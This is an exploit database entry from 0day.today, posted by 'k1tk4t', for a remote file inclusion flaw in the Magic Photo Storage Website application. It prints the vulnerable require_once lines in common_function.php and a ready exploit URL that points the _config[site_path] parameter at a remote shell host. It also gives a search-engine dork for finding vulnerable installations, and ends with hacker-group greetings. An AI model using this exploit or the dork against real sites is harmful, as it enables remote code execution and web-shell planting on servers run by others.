[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Magic Photo Storage Website _config[site_path] File Include Vuln

Author
k1tk4t
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1374
Category
web applications
Date add
08-01-2007
Platform
unsorted
================================================================
Magic Photo Storage Website _config[site_path] File Include Vuln
================================================================



########################################################################
# magic photo storage website -- Remote File Inclusion
# Found By       : k1tk4t 
########################################################################
file;
common_function.php

bug;
require_once $_config['site_path'] . '/class/session.class.php';
require_once $_config['site_path'] . '/class/validator.class.php';
require_once $_config['site_path'] . '/include/message.php';
########################################################################
exploit;
http://localhost/include/common_function.php?_config[site_path]=http://shell
########################################################################
Dork;
allinurl:catalog_login.php
########################################################################
Thanks;
xoron 
[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159
evilcode,illibero,NoGe,nyubi,x-ace,ghoz,
home_edition2001,matdhule,iFX,fusion
and for all(friend's&enemy)



#  0day.today [2024-11-16]  #